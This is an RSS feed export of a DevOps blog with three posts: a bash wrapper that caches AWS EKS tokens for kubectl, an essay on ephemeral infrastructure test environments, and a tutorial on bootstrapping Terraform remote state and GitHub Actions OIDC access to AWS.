<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[FeaX's Blog]]></title><description><![CDATA[Tech, Kubernetes, 3D printing, etc.]]></description><link>https://fe.ax/</link><image><url>https://fe.ax/favicon.png</url><title>FeaX&apos;s Blog</title><link>https://fe.ax/</link></image><generator>Ghost 5.88</generator><lastBuildDate>Fri, 10 Apr 2026 14:39:13 GMT</lastBuildDate><atom:link href="https://fe.ax/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Speed up kubectl commands (and k9s) when using AWS]]></title><description><![CDATA[<p>AWS runs the AWS-CLI every time  you run a command using kubectl. It&apos;s in your kubeconfig file. I started to notice it and came up with this script to bypass the slow AWS CLI.</p><pre><code class="language-shell">#!/usr/bin/env bash
set -euo pipefail

# Build an array of non-flag arguments by</code></pre>]]></description><link>https://fe.ax/speed-up-kubectl-commands-and-k9s-when-using-aws/</link><guid isPermaLink="false">67a2325fefe9750063746034</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Tue, 04 Feb 2025 15:31:45 GMT</pubDate><content:encoded><![CDATA[<p>kubectl runs the AWS CLI every time you execute a command against an EKS cluster: the credential plugin is configured in your kubeconfig file. I started to notice the delay and came up with this script to cache the token and bypass the slow AWS CLI.</p><pre><code class="language-shell">#!/usr/bin/env bash
set -euo pipefail

# Requires jq to read the expiration timestamp from the cached token.

# Build an array of non-flag arguments by iterating over all arguments.
# For any argument starting with &quot;--&quot; that does NOT include &quot;=&quot;,
# skip that argument and (if available) its immediate next value.
args=(&quot;$@&quot;)
nonflag_args=()
i=0
while (( i &lt; ${#args[@]} )); do
    arg=&quot;${args[$i]}&quot;
    if [[ &quot;$arg&quot; == --* ]]; then
        # If the flag is provided in the form &quot;--flag=value&quot;, treat it as one argument.
        if [[ &quot;$arg&quot; != *=* ]]; then
            # Skip this flag and its following value (if any).
            i=$((i+2))
            continue
        fi
    else
        nonflag_args+=(&quot;$arg&quot;)
    fi
    i=$((i+1))
done
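# Worked example (hypothetical invocation): for the arguments
#   --region us-east-1 eks get-token --cluster-name demo
# the loop skips &quot;--region us-east-1&quot; and &quot;--cluster-name demo&quot;,
# leaving nonflag_args=(eks get-token).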

# Check if the first two non-flag arguments are &quot;eks&quot; and &quot;get-token&quot;.
if [[ &quot;${nonflag_args[0]:-}&quot; != &quot;eks&quot; || &quot;${nonflag_args[1]:-}&quot; != &quot;get-token&quot; ]]; then
    exec aws &quot;$@&quot;
fi

# Extract the --cluster-name value from the arguments (supports both forms).
CLUSTER_NAME=&quot;&quot;
for (( i=0; i &lt; ${#args[@]}; i++ )); do
    case &quot;${args[$i]}&quot; in
        --cluster-name)
            if (( i+1 &lt; ${#args[@]} )); then
                CLUSTER_NAME=&quot;${args[$((i+1))]}&quot;
            fi
            ;;
        --cluster-name=*)
            CLUSTER_NAME=&quot;${args[$i]#--cluster-name=}&quot;
            ;;
    esac
done

if [[ -z &quot;$CLUSTER_NAME&quot; ]]; then
    echo &quot;Error: --cluster-name not provided.&quot; &gt;&amp;2
    exit 1
fi

# Set up the cache directory and file.
CACHE_DIR=&quot;${HOME}/.aws/kubetokencache&quot;
CACHE_FILE=&quot;${CACHE_DIR}/${CLUSTER_NAME}.json&quot;

# Check if a cached token exists and is valid for at least 30 seconds.
if [[ -f &quot;$CACHE_FILE&quot; ]]; then
    # Extract the expirationTimestamp using jq.
    EXPIRATION=$(jq -r &apos;.status.expirationTimestamp // empty&apos; &quot;$CACHE_FILE&quot;)
    if [[ -n &quot;$EXPIRATION&quot; ]]; then
        # Convert the expiration timestamp (ISO 8601) to epoch seconds.
        exp_epoch=$(date -d &quot;$EXPIRATION&quot; +%s 2&gt;/dev/null || date -j -f &quot;%Y-%m-%dT%H:%M:%SZ&quot; &quot;$EXPIRATION&quot; &quot;+%s&quot; 2&gt;/dev/null || echo 0)
        now_epoch=$(date +%s)
        # If the token remains valid for at least another 30 seconds, output the cached file.
        if (( exp_epoch - now_epoch &gt; 30 )); then
            cat &quot;$CACHE_FILE&quot;
            exit 0
        fi
    fi
fi

# No valid cached token found; run the actual AWS CLI command.
TOKEN_JSON=$(aws &quot;$@&quot;)

# Create the cache directory if it doesn&apos;t exist, readable only by the user.
mkdir -p &quot;$CACHE_DIR&quot;
chmod 700 &quot;$CACHE_DIR&quot;

# Cache the new token with user-only permissions, since it grants cluster access.
(umask 077; echo &quot;$TOKEN_JSON&quot; &gt; &quot;$CACHE_FILE&quot;)

# Output the token.
echo &quot;$TOKEN_JSON&quot;
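
# To use this script (assumption: save it somewhere on your PATH and make it
# executable), point the exec section of your kubeconfig user at the wrapper
# instead of the aws binary, e.g.:
#
#   users:
#   - name: my-eks-user
#     user:
#       exec:
#         apiVersion: client.authentication.k8s.io/v1beta1
#         command: /path/to/aws-cached.sh
#         args: [&quot;eks&quot;, &quot;get-token&quot;, &quot;--cluster-name&quot;, &quot;my-cluster&quot;]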
</code></pre>]]></content:encoded></item><item><title><![CDATA[Isolating DevOps changes using ephemeral infra environments]]></title><description><![CDATA[This blog post describes DevOps' ephemeral environments, a way for DevOps to create safe environments to test changes to the cluster.]]></description><link>https://fe.ax/ephemeral-infra-environments/</link><guid isPermaLink="false">66a7f874e23876005ee37fe3</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Fri, 27 Sep 2024 20:56:04 GMT</pubDate><content:encoded><![CDATA[<p>Most companies have a production and testing environment for development. Both are used daily by developers and users. Platform or DevOps engineers often also use these test environments, and their work can break that environment due to faulty changes.  Some companies schedule these changes &quot;outside of working hours.&quot; Which is horrible for the people working on those changes.</p><p>For the application developers, it&apos;s normal to create a branch, write some code, and push it to git to be presented with an ephemeral environment&#x2014;an instance of the application made just in time for you.</p><p>In your application instance, you click around and make some API calls. All without interacting with the <em>production </em>environment because you&apos;re in the <em>test </em>environment. Your code is doing fine, but suddenly, API calls fail randomly or even stop responding altogether. After debugging for a few minutes, you figure out that someone in the DevOps team is also working on some changes, breaking the test cluster.</p><p>The Kubernetes ingress controller needs an update, and just like your own code, the changes don&apos;t always work immediately. Your colleagues next to you are all hitting the F5 button like there is no tomorrow. The Slack channel gets pinged: &quot;Cluster down??&quot;</p><p>This situation happens more than DevOps&apos;ers like to admit. 
Although you&apos;re testing it on the <em>test</em> cluster, it is <em>production</em> to the company. The solution is easy: yet another cluster, right? Prod, test, validation? Like a <em>DevOps test</em> cluster? If a <em>DevOps test</em> cluster exists, will only one person work on stuff?</p><p>What if I told you there was an elegant solution?</p><h2 id="the-idea">The idea</h2><p>Having DevOps&apos; ephemeral environments means you can create and destroy clusters whenever you&apos;re working on something as a DevOps&apos;er, just like the developers do. This creates a safe environment for you to experiment with and test changes to the infrastructure.</p><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2024/09/image-2.png" class="kg-image" alt loading="lazy" width="466" height="131"></figure><h3 id="test-is-a-production-cluster"><em>Test</em> is a production cluster</h3><p>When a cluster can&apos;t be deleted, it&apos;s production to someone, and that someone is affected when you kill it off or play around with it. This means that when the DevOps guy wrecks a test cluster that prevents anyone from working, you accidentally break a cluster that was production <strong>to you</strong>.</p><h3 id="hand-sculpting-a-beautifully-unstable-cluster">Hand-sculpting a beautifully unstable cluster</h3><p>When creating ephemeral clusters, it is important to reimagine how your production clusters exist. These clusters shouldn&apos;t be hand-sculpted masterpieces of art; instead, they should be easily copied or reproduced like printouts. Adding pieces to your infrastructure piece by piece can cause your blueprint to become unstable. When the time comes for you to rebuild your testing or production cluster, it will no longer be possible to build it up without taking hours to figure out what is wrong. 
Even worse, you aren&apos;t used to creating new clusters.</p><p>Then there is <a href="https://www.lastweekinaws.com/blog/clickops/">ClickOps&apos;ing</a> and Ninja&apos;ing, which create unpredictable behavior, something we don&apos;t want in production. There is no record of change, and nobody remembers what happened three days ago.</p><p>Therefore, it&apos;s essential to be able to spin up a replica of that production cluster whenever you need it and <strong>throw it away when you&apos;re heading home</strong>.</p><h2 id="cluster-generation-with-prs">Cluster generation with PRs</h2><p>When you start working on something&#x2014;an update to a controller, for example&#x2014;you should do this on a cluster that is as close to production as possible. Testing in production doesn&apos;t fly for infrastructure, so you need a copy. Let&apos;s take a look at the options:</p><ul><li>Production: Impacts customers</li><li>Testing: Impacts developer colleagues</li><li>Persistent validation: Impacts DevOps colleagues and is expensive</li><li>Ephemeral validation: Impacts only you</li></ul><p>Now, this isn&apos;t easily done. Converting your blueprint to roll out 2+n clusters will require changes. Your blueprints might also require manual steps like allocating external resources (active directory, cloud resources, names, etc.). However, the biggest problem you will probably have is reproducibility.</p><p>The most important aspect of using ephemeral cluster generation is having a reproducible cluster. Whenever a PR is opened for infra, the environment should be built up and destroyed automatically when it is closed. Manual interventions make starting up a new cluster annoying and should be avoided entirely. You don&apos;t want to write a guide on how this mechanism works because of the shortcuts you took. It should work without explanation.</p><h2 id="cluster-upgrade-testing">Cluster upgrade testing</h2><p>Having the ability to generate clusters brings another great feature. 
Upgrade tests mean that you&apos;re running a pipeline on your ephemeral environment, which:</p><ol><li>Destroys your cluster completely</li><li>Builds it back up from the main branch</li><li>Runs the test suite of the main branch to verify it&apos;s working correctly</li><li>Starts the upgrades of the cluster to your branch in one go</li><li>Runs the test suite of your branch</li></ol><p>Using such a workflow ensures that your changes will work on the clusters currently running the main branch.</p><p>The most obvious scenario for this is updating the cluster, whether it&apos;s something like Crossplane or Kubernetes itself.</p><h3 id="example-scenario">Example scenario</h3><p>You could run into dependency constraints whenever you&apos;re building a new feature. For example, Crossplane creates its CRDs, not through ArgoCD reading the Helm chart. This can work when you&apos;re slowly building your change:</p><ol><li>Add Crossplane to your setup<ol><li>Crossplane creates the Provider CRD</li></ol></li><li>You add the S3 AWS provider</li></ol><p>But what if you merge this as one run into production?</p><ol><li>ArgoCD adds Crossplane and the S3 AWS Provider to your setup<ol><li>ArgoCD fails to dry-run Helm because it doesn&apos;t know the Provider CRD</li></ol></li></ol><p>By running an upgrade test, you would have found this flaw early.</p><p>This is one of the most confidence-creating features of having DevOps&apos; ephemeral environments.</p><h2 id="cost-control">Cost control</h2><p>Running additional environments isn&apos;t free. When you&apos;re working on something, a complete extra cluster will be created, and you&apos;ll pay for the resources you use. It&apos;s essential to keep track of the costs of these environments.</p><h3 id="track-costs">Track costs</h3><p>If you&apos;re in AWS or any other cloud that uses the pay-per-minute model, you can put the resources in a separate group. 
This can be done using tags or separate accounts (which is also nice for security). Set budgets and notifications for when you run over your budget to ensure you don&apos;t run into a $10,000 bill just for some runaway controller creating hundreds of RDS databases.</p><h3 id="shut-down-the-environment">Shut down the environment</h3><p>The ability to start environments whenever you want also allows you to delete environments you&apos;re not currently working on. For example, when you&apos;re heading home at the end of the day, you can shut down the environment to save costs. It takes time for your environment to become ready, so you will probably not shut it down for a bathroom break.</p><p>This also lets you keep testing whether your new changes break cluster generation due to a circular dependency.</p><h3 id="disable-features">Disable features</h3><p>Some things are outside the cluster&apos;s operational scope. For example, our audit logs in CloudWatch made up half of the costs of our validation account.</p><p>You can also run all nodes on spot, which is good practice for your testing and production environment, too. It&apos;s free chaos engineering, but make sure the application keeps working. All of our nodes have a 24-hour expiration date, which continuously tests node disruptions.</p><p>Of course, you can do a lot more, but prevent drifting too far away from production by using a different blueprint for validation.</p><h3 id="nuke-it">Nuke it</h3><p>It is also good practice to clean up everything in your account. I use <a href="https://github.com/ekristen/aws-nuke">aws-nuke</a>&#xA0;for this. Every Friday evening, resources not explicitly excluded from the nuking process are removed from the AWS account. This ensures you don&apos;t have leftover resources from experiments.</p><h2 id="conclusion">Conclusion</h2><p>This is one of the most important technical things I learned last year at my job at Alliander. They have this flow in place, and it works great. 
Now, I&apos;ve implemented this flow at the company where I&apos;m currently working, Viya, and I&apos;m 100% in on this. I&apos;ll probably be writing about some technical stuff related to this workflow in the future.</p>]]></content:encoded></item><item><title><![CDATA[Bootstrapping Terraform GitHub Actions for AWS]]></title><description><![CDATA[Bootstrapping all Terraform required components to run and manage itself in GitHub Actions for AWS.]]></description><link>https://fe.ax/bootstrapping-tf-gha-for-aws/</link><guid isPermaLink="false">65abbc433d4c63005dfb2df8</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sun, 21 Jan 2024 19:33:41 GMT</pubDate><media:content url="https://fe.ax/content/images/2024/01/DALL-E-2024-01-21-20.27.13---A-visually-engaging-and-illustrative-feature-image-for-a-blog-article-about-bootstrapping-Terraform-with-GitHub-Actions-for-AWS.-The-image-should-depi--1-.png" medium="image"/><content:encoded><![CDATA[<img src="https://fe.ax/content/images/2024/01/DALL-E-2024-01-21-20.27.13---A-visually-engaging-and-illustrative-feature-image-for-a-blog-article-about-bootstrapping-Terraform-with-GitHub-Actions-for-AWS.-The-image-should-depi--1-.png" alt="Bootstrapping Terraform GitHub Actions for AWS"><p>In a journey to eliminate all clickops, I want to automate the deployment of the core of my AWS infra with GitHub Actions. To do this, I need to create the IDP, IAM roles, the S3 bucket for the state, and the DynamoDB table for locking.</p><p>Terraform uses these, so it&apos;s a bit like the chicken and egg problem.</p><p>In this post, I will make Terraform manage its dependencies and connect GitHub Actions to AWS.</p><h2 id="bootstrapping-the-basics">Bootstrapping the basics</h2><p>Let&apos;s set up a skeleton for our Terraform configuration. 
The goal is to be able to:</p><ul><li>Create the requirements for a remote state from Terraform</li><li>Authenticate to AWS using OIDC</li><li>Run Terraform in GitHub Actions</li></ul><h3 id="creating-the-s3-and-dynamodb-terraform">Creating the S3 and DynamoDB Terraform</h3><p>Terraform uses S3 for its state and a DynamoDB table to prevent simultaneous runs. These do not exist already, and we <strong>don&apos;t want to create them by hand</strong>. This is why the first module I created in my AWS Core Terraform config repository is <code>remote-state</code>. This module has to be bootstrapped, and the state must eventually be migrated to the created S3 bucket.</p><p>This module is responsible for creating the needed resources and <strong>generating the <code>backend.tf</code> file.</strong></p><p>To set up the required components, I used the following Terraform code:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;random_id&quot; &quot;tfstate&quot; {
  byte_length = 8
}

resource &quot;aws_s3_bucket&quot; &quot;terraform_state&quot; {
  bucket = &quot;tfstate-${random_id.tfstate.hex}&quot;

  lifecycle {
    prevent_destroy = true
  }
}

resource &quot;aws_s3_bucket_versioning&quot; &quot;terraform_state&quot; {
  bucket = aws_s3_bucket.terraform_state.id

  versioning_configuration {
    status = &quot;Enabled&quot;
  }
}

resource &quot;aws_dynamodb_table&quot; &quot;terraform_state_lock&quot; {
  name         = &quot;app-state-${random_id.tfstate.hex}&quot;
  hash_key     = &quot;LockID&quot;
  billing_mode = &quot;PAY_PER_REQUEST&quot;

  attribute {
    name = &quot;LockID&quot;
    type = &quot;S&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">remote-state module</span></p></figcaption></figure><p>To make the bucket name unique, I created a random ID, which is eventually saved in the Terraform state and will not change on subsequent runs.</p><p>For the DynamoDB table, I&apos;ve set it up using <a href="https://docs.aws.amazon.com/amazondynamodb/latest/developerguide/HowItWorks.ReadWriteCapacityMode.html#HowItWorks.OnDemand">PAY_PER_REQUEST</a> because Terraform will not use even one query per second, and provisioning anything will likely result in more costs.</p><p>The attribute we&apos;re setting is the LockID <a href="https://developer.hashicorp.com/terraform/language/settings/backends/s3#dynamodb-state-locking">which Terraform needs</a>.</p><p>Next, we need Terraform to create the <code>backend.tf</code> file after it creates its required components.</p><p>I created this short template as <code>state-backend.tftpl</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  backend &quot;s3&quot; {
    bucket         = &quot;${bucket}&quot;
    key            = &quot;states/terraform.tfstate&quot;
    encrypt        = true
    dynamodb_table = &quot;${dynamodb_table}&quot;
    region         = &quot;${region}&quot;
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">state-backend.tftpl</span></p></figcaption></figure><p>The <a href="https://developer.hashicorp.com/terraform/language/functions/templatefile">templatefile function</a> renders this template with the values of the resources we just created.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;local_sensitive_file&quot; &quot;foo&quot; {
  content = templatefile(&quot;${path.module}/state-backend.tftpl&quot;, {
    bucket         = aws_s3_bucket.terraform_state.id
    dynamodb_table = aws_dynamodb_table.terraform_state_lock.name
    region         = var.aws_region
  })
  filename = &quot;${path.module}/../../backend.tf&quot;
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">templatefile function</span></p></figcaption></figure><p>You can find the complete Terraform code <a href="https://github.com/fe-ax/tf-aws/tree/main/terraform/modules/remote-state">here</a>.</p><h3 id="bootstrapping-the-remote-state">Bootstrapping the remote state</h3><p>When we run the remote-state module, we see that Terraform is creating everything as we&apos;d expect:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">~$ terraform apply -target module.remote-state

Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # module.remote-state.aws_dynamodb_table.terraform_state_lock will be created
  + resource &quot;aws_dynamodb_table&quot; &quot;terraform_state_lock&quot; {
      + arn              = (known after apply)
      + billing_mode     = &quot;PAY_PER_REQUEST&quot;
      + hash_key         = &quot;LockID&quot;
      + id               = (known after apply)
      + name             = (known after apply)
      + read_capacity    = (known after apply)
      + stream_arn       = (known after apply)
      + stream_label     = (known after apply)
      + stream_view_type = (known after apply)
      + tags_all         = (known after apply)
      + write_capacity   = (known after apply)

      + attribute {
          + name = &quot;LockID&quot;
          + type = &quot;S&quot;
        }
    }

  # module.remote-state.aws_s3_bucket.terraform_state will be created
  + resource &quot;aws_s3_bucket&quot; &quot;terraform_state&quot; {
      + acceleration_status         = (known after apply)
      + acl                         = (known after apply)
      + arn                         = (known after apply)
      + bucket                      = (known after apply)
      + bucket_domain_name          = (known after apply)
      + bucket_regional_domain_name = (known after apply)
      + force_destroy               = true
      + hosted_zone_id              = (known after apply)
      + id                          = (known after apply)
      + object_lock_enabled         = (known after apply)
      + policy                      = (known after apply)
      + region                      = (known after apply)
      + request_payer               = (known after apply)
      + tags_all                    = (known after apply)
      + website_domain              = (known after apply)
      + website_endpoint            = (known after apply)
    }

  # module.remote-state.aws_s3_bucket_versioning.terraform_state will be created
  + resource &quot;aws_s3_bucket_versioning&quot; &quot;terraform_state&quot; {
      + bucket = (known after apply)
      + id     = (known after apply)

      + versioning_configuration {
          + mfa_delete = (known after apply)
          + status     = &quot;Enabled&quot;
        }
    }

  # module.remote-state.local_sensitive_file.foo will be created
  + resource &quot;local_sensitive_file&quot; &quot;foo&quot; {
      + content              = (sensitive value)
      + directory_permission = &quot;0700&quot;
      + file_permission      = &quot;0700&quot;
      + filename             = &quot;modules/remote-state/../../backend.tf&quot;
      + id                   = (known after apply)
    }

  # module.remote-state.random_id.tfstate will be created
  + resource &quot;random_id&quot; &quot;tfstate&quot; {
      + b64_std     = (known after apply)
      + b64_url     = (known after apply)
      + byte_length = 8
      + dec         = (known after apply)
      + hex         = (known after apply)
      + id          = (known after apply)
    }

Plan: 5 to add, 0 to change, 0 to destroy.</code></pre><figcaption><p><span style="white-space: pre-wrap;">Terraform apply</span></p></figcaption></figure><p>However, because we generated and placed the <code>backend.tf</code> file, we see a warning when running it the second time:</p><pre><code class="language-hcl">&#x2502; Error: Backend initialization required, please run &quot;terraform init&quot;
&#x2502; 
&#x2502; Reason: Initial configuration of the requested backend &quot;s3&quot;</code></pre><p>To migrate the local state to the just created S3 bucket, we can use the following command:</p><pre><code class="language-bash">~$ terraform init -migrate-state

Initializing the backend...
Do you want to copy existing state to the new backend?
  Pre-existing state was found while migrating the previous &quot;local&quot; backend to the newly configured &quot;s3&quot; backend. No existing state was found in the newly configured &quot;s3&quot; backend. Do you want to copy this state to the new &quot;s3&quot; backend?

  Enter &quot;yes&quot; to copy and &quot;no&quot; to start with an empty state.

  Enter a value: yes


Successfully configured the backend &quot;s3&quot;! Terraform will automatically
use this backend unless the backend configuration changes.
Initializing modules...

Initializing provider plugins...
- Reusing previous version of hashicorp/random from the dependency lock file
- Reusing previous version of hashicorp/local from the dependency lock file
- Reusing previous version of hashicorp/aws from the dependency lock file
- Using previously-installed hashicorp/random v3.6.0
- Using previously-installed hashicorp/local v2.2.2
- Using previously-installed hashicorp/aws v4.37.0

Terraform has been successfully initialized!</code></pre><p>After the migration, you should be able to rerun it without any expected changes:</p><pre><code class="language-bash">~$ terraform apply -target module.remote-state
module.remote-state.random_id.tfstate: Refreshing state... [id=_q9zfFjtnUQ]
module.remote-state.aws_dynamodb_table.terraform_state_lock: Refreshing state... [id=app-state-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.aws_s3_bucket_versioning.terraform_state: Refreshing state... [id=tfstate-feaf737c58ed9d44]
module.remote-state.local_sensitive_file.foo: Refreshing state... [id=6a30000a63c0f6d2d5ef8be77cce05bdfc237df7]

No changes. Your infrastructure matches the configuration.

Terraform has compared your real infrastructure against your configuration and found no differences, so no changes are needed.</code></pre><p>We have a remote state which we can use in GitHub Actions now &#x1F389;</p><h2 id="setting-up-a-github-actions-pipeline-for-terraform">Setting up a GitHub Actions Pipeline for Terraform</h2><p>Although it might seem the wrong way around, I want to set up a Terraform pipeline before configuring the authentication from GitHub Actions to AWS. By having a broken pipeline, we can test the configuration we will build more easily.</p><p>To start using GitHub actions, we create a directory <code>.github/workflows</code> and place a yaml file there. You can find mine <a href="https://github.com/fe-ax/tf-aws/tree/main/.github/workflows">here</a>.</p><p>The workflow consists of two jobs: the <code>plan</code> job and the <code>apply</code> job. The hard requirements I have for this workflow are:</p><ol><li>Run the <code>plan</code> job on every commit</li><li>Merging is only available if the plan succeeds</li><li>Run the <code>apply</code> job only on the main branch</li><li>Run the <code>apply</code> job only if there are changes</li><li>Require manual approval for the <code>apply</code> job to run</li><li>No use of access keys</li><li>Account ID not visible</li></ol><p>Most of these are straightforward, and the comments in GitHub should explain enough. Some were more interesting.</p><h3 id="merging-is-only-available-if-the-plan-succeeds">Merging is only available if the plan succeeds</h3><p>It&apos;s good practice to prevent pushes to the main branch. You can block pushes by using <a href="https://docs.github.com/en/repositories/configuring-branches-and-merges-in-your-repository/managing-protected-branches/managing-a-branch-protection-rule">branch protection rules</a>. 
I chose to:</p><ol><li>Require a pull request before merging</li><li>Require conversation resolution before merging</li><li>Require linear history</li><li>Require deployments to succeed before merging</li><li>Do not allow bypassing the above settings</li></ol><p>The most relevant options selected are options 1 and 4. These ensure everything will be funneled through a pull request only if the workflow succeeds.</p><h3 id="run-the-apply-job-only-if-there-are-changes">Run the apply job only if there are changes</h3><p>When you change things like placing comments, it will not change the outcome of the terraform plan. In that case, we can skip the apply step.</p><p>The <a href="https://github.com/hashicorp/setup-terraform#:~:text=Subsequent%20steps%20can%20access%20outputs%20when%20the%20wrapper%20script%20is%20installed%3A">Terraform setup wrapper</a> sets a couple of outputs in GitHub Actions. The most interesting one for this requirement is the <code>steps.plan.outputs.exitcode</code>. This is set as an output in the <code>plan</code> job, and in the <code>apply</code> job, we can use it as a run condition.</p><figure class="kg-card kg-code-card"><pre><code class="language-yaml">  apply:
    runs-on: ubuntu-latest
    environment: production
    needs: plan
    if: |
      github.ref == &apos;refs/heads/main&apos; &amp;&amp;
      needs.plan.outputs.returncode == 2</code></pre><figcaption><p><span style="white-space: pre-wrap;">if using the main branch and changes are detected in the Terraform plan</span></p></figcaption></figure><h3 id="require-manual-approval-for-the-apply-job-to-run">Require manual approval for the <code>apply</code> job to run</h3><p>A few GitHub bot scripts/actions allow you to open issues and place &quot;LGTM!&quot; comments to approve the next step: apply. I disliked how you use comments to approve steps, although it can be marked up nicely if you prefer this way.</p><p>GitHub allows you to <a href="https://docs.github.com/en/actions/managing-workflow-runs/reviewing-deployments">review jobs</a> that are in specific environments. To enable this, you open the settings tab in your repository and select Environments. You can add new environments if they are not already created automatically here. I created <code>plan</code> and <code>apply</code>.</p><p>Once they are created, you can enable the option <code>Required reviewers</code> and add yourself to the reviewers&apos; list.</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="798" height="820" srcset="https://fe.ax/content/images/size/w600/2024/01/image.png 600w, https://fe.ax/content/images/2024/01/image.png 798w"><figcaption><span style="white-space: pre-wrap;">Configuring environments</span></figcaption></figure><h3 id="concluding-the-github-action-pipeline">Concluding the GitHub Action pipeline</h3><p>Now, we can run Terraform from GitHub actions and check the plan before we apply! &#x1F389;</p><p>We&apos;re also probably very happy to see the following error in the pipeline:</p><pre><code class="language-bash">Assuming role with OIDC
Error: Could not assume role with OIDC: No OpenIDConnect provider found in your account for https://token.actions.githubusercontent.com</code></pre><p>This means that not everyone can access our AWS account. Let&apos;s dive into establishing a trust relationship between AWS and GitHub Actions.</p><p>Terraform warns you that running <code>plan</code> and <code>apply</code> separately without writing a plan to file means the eventual <code>apply</code> may differ from the plan you reviewed. This is because when you don&apos;t write your plan to a file, you cannot be certain that by the time you approve your rollout to production, your AWS state will still be the same.</p><p>When you run the plan command with <code>-out</code>, you can make sure that the apply step applies exactly what you had planned, and fails if the state has changed in the meantime.</p><h2 id="trusting-the-github-repository-using-oidc">Trusting the GitHub repository using OIDC</h2><p>We must add an identity provider (IDP) to our AWS account to establish trust. This cannot be done from the GitHub Actions workflow we created because it has no access yet.</p><h3 id="adding-the-identity-provider-to-aws-using-terraform">Adding the identity provider to AWS using Terraform</h3><p>To create the IDP, we can always use the same Terraform code:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;aws_iam_openid_connect_provider&quot; &quot;default&quot; {
  url = &quot;https://token.actions.githubusercontent.com&quot;

  client_id_list = [
    &quot;sts.amazonaws.com&quot;,
  ]

  thumbprint_list = [&quot;1b511abead59c6ce207077c0bf0e0043b1382612&quot;]
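  # This is GitHub&apos;s OIDC certificate thumbprint at the time of writing;
  # if AssumeRoleWithWebIdentity starts failing, re-check it against the
  # current AWS and GitHub documentation.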
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Identity provider in Terraform</span></p></figcaption></figure><p>For this part, I followed <a href="https://aws.amazon.com/blogs/security/use-iam-roles-to-connect-github-actions-to-actions-in-aws/">this</a> guide and placed the IDP <a href="https://github.com/fe-ax/tf-aws/blob/main/terraform/01-idp.tf">here</a>. This allows GitHub to assume roles when the role trusts GitHub. The <code>thumbprint_list</code> contains GitHub&apos;s certificate thumbprint at the time of writing.</p><h3 id="creating-a-role-for-github-to-assume">Creating a role for GitHub to assume</h3><p>Creating roles with Terraform takes a lot of lines of code. You can read the whole config <a href="https://github.com/fe-ax/tf-aws/blob/main/terraform/modules/roles/core.tf">here</a>. I will only discuss the trust policy here.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">data &quot;aws_iam_policy_document&quot; &quot;core_trusted_entities_policy_document&quot; {
  statement {
    actions = [&quot;sts:AssumeRoleWithWebIdentity&quot;]

    principals {
      type        = &quot;Federated&quot;
      identifiers = [var.oidc_id_github]
    }

    condition {
      test     = &quot;StringEquals&quot;
      variable = &quot;token.actions.githubusercontent.com:aud&quot;
      values   = [&quot;sts.amazonaws.com&quot;]
    }

    condition {
      test     = &quot;StringEquals&quot;
      variable = &quot;token.actions.githubusercontent.com:sub&quot;
      values = [
        &quot;repo:fe-ax/tf-aws:environment:plan&quot;,
        &quot;repo:fe-ax/tf-aws:environment:apply&quot;
      ]
    }
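    # Hypothetical variant: to trust a branch rather than an environment,
    # the sub claim takes the form &quot;repo:ORG/REPO:ref:refs/heads/BRANCH&quot;,
    # typically matched with a &quot;StringLike&quot; test and wildcard values.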
  }
}</code></pre><figcaption><p><span style="white-space: pre-wrap;">Trust policy for GHA</span></p></figcaption></figure><p>A trust policy always needs to select a principal; here it is a federated principal, since we&apos;re linking to GitHub.</p><p>Next, we must add a condition allowing GitHub to send requests to the AWS STS (Security Token Service).</p><p>Finally, we specify which environments can access this role. I chose not to split up the read/write roles of the plan/apply jobs, but it would be good practice to do this. The condition &quot;StringEquals&quot; checks for an exact match against one of the listed values.</p><h3 id="applying-the-configuration">Applying the configuration</h3><p>When everything is ready, we can locally run <code>terraform apply</code> to apply all the new additions and take the last step before running our GitHub Actions workflow successfully.</p><h3 id="testing-the-github-actions-workflow">Testing the GitHub Actions workflow</h3><p>The time has come to put everything to the test. First, push everything to a branch if you haven&apos;t already done so. Then, create a pull request from your branch to main.</p><p>It should start running like this:</p><figure class="kg-card kg-image-card kg-width-wide kg-card-hascaption"><img src="https://fe.ax/content/images/2024/01/image-2.png" class="kg-image" alt="Bootstrapping Terraform GitHub Actions for AWS" loading="lazy" width="938" height="440" srcset="https://fe.ax/content/images/size/w600/2024/01/image-2.png 600w, https://fe.ax/content/images/2024/01/image-2.png 938w"><figcaption><span style="white-space: pre-wrap;">Running actions blocking merge</span></figcaption></figure><p>The merge is blocked until the run is complete. 
